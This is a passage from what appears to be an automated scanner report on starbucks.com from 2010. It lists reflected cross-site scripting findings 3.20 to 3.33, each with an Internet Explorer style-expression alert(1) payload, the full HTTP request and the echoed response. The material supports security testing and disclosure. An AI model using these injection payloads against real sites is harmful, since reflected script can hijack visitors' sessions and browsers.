User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:45 GMT
Connection: close
Content-Length: 42842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style="x:expression(alert(1))"d1da931e99d=1"/>
...[SNIP]...

3.20. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 818c9"style="x:expression(alert(1))"3aaeb9fa4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via?818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:49 GMT
Connection: close
Content-Length: 51777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via?818c9"style="x:expression(alert(1))"3aaeb9fa4a=1"/>
...[SNIP]...

3.21. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/flavored-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4285"style%3d"x%3aexpression(alert(1))"cebb7d2a308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4285"style="x:expression(alert(1))"cebb7d2a308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/flavored-coffee?d4285"style%3d"x%3aexpression(alert(1))"cebb7d2a308=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:37 GMT
Content-Length: 53694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?d4285"style="x:expression(alert(1))"cebb7d2a308=1"/>
...[SNIP]...

3.22. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7511a"style="x:expression(alert(1))"c08da2b8d6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/instant-coffee?7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:24 GMT
Connection: close
Content-Length: 53628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?7511a"style="x:expression(alert(1))"c08da2b8d6b=1"/>
...[SNIP]...

3.23. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32506"style%3d"x%3aexpression(alert(1))"0b3e0429598 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32506"style="x:expression(alert(1))"0b3e0429598 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee?32506"style%3d"x%3aexpression(alert(1))"0b3e0429598=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:46 GMT
Connection: close
Content-Length: 54456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?32506"style="x:expression(alert(1))"0b3e0429598=1"/>
...[SNIP]...

3.24. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36fd8"style="x:expression(alert(1))"eee799f60ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/africa-arabia?36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:18 GMT
Connection: close
Content-Length: 41207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?36fd8"style="x:expression(alert(1))"eee799f60ab=1"/>
...[SNIP]...

3.25. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d4f5"style="x:expression(alert(1))"07322c9d36a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/asia-pacific?5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:23 GMT
Connection: close
Content-Length: 40730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?5d4f5"style="x:expression(alert(1))"07322c9d36a=1"/>
...[SNIP]...

3.26. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc378"style="x:expression(alert(1))"dc2a561ad6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:32:57 GMT
Connection: close
Content-Length: 42564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style="x:expression(alert(1))"dc2a561ad6f=1"/>
...[SNIP]...

3.27. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ed27"style="x:expression(alert(1))"54fc7b2d713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/latin-america?9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:15 GMT
Connection: close
Content-Length: 44497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?9ed27"style="x:expression(alert(1))"54fc7b2d713=1"/>
...[SNIP]...

3.28. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f92e"style="x:expression(alert(1))"69974f7cbb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/multi-region-blends?2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:29 GMT
Connection: close
Content-Length: 44773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?2f92e"style="x:expression(alert(1))"69974f7cbb4=1"/>
...[SNIP]...

3.29. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68bf7"style="x:expression(alert(1))"0236f70923d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:22 GMT
Connection: close
Content-Length: 41054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style="x:expression(alert(1))"0236f70923d=1"/>
...[SNIP]...

3.30. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e95fa"style%3d"x%3aexpression(alert(1))"75289b27baf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e95fa"style="x:expression(alert(1))"75289b27baf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse?e95fa"style%3d"x%3aexpression(alert(1))"75289b27baf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:39:22 GMT
Connection: close
Content-Length: 51155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse?e95fa"style="x:expression(alert(1))"75289b27baf=1"/>
...[SNIP]...

3.31. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e306b"style%3d"x%3aexpression(alert(1))"0add0d892c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e306b"style="x:expression(alert(1))"0add0d892c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/community?e306b"style%3d"x%3aexpression(alert(1))"0add0d892c7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:11 GMT
Connection: close
Content-Length: 41531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community?e306b"style="x:expression(alert(1))"0add0d892c7=1"/>
...[SNIP]...

3.32. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community/mystarbucksidea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb2f"style%3d"x%3aexpression(alert(1))"d8b67fa78b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fb2f"style="x:expression(alert(1))"d8b67fa78b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/community/mystarbucksidea?6fb2f"style%3d"x%3aexpression(alert(1))"d8b67fa78b9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:51:50 GMT
Connection: close
Content-Length: 41586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community/mystarbucksidea?6fb2f"style="x:expression(alert(1))"d8b67fa78b9=1"/>
...[SNIP]...

3.33. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c416"style%3d"x%3aexpression(alert(1))"6c5f6b29f5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c416"style="x:expression(alert(1))"6c5f6b29f5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/entertainment?1c416"style%3d"x%3aexpression(alert(1))"6c5f6b29f5d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

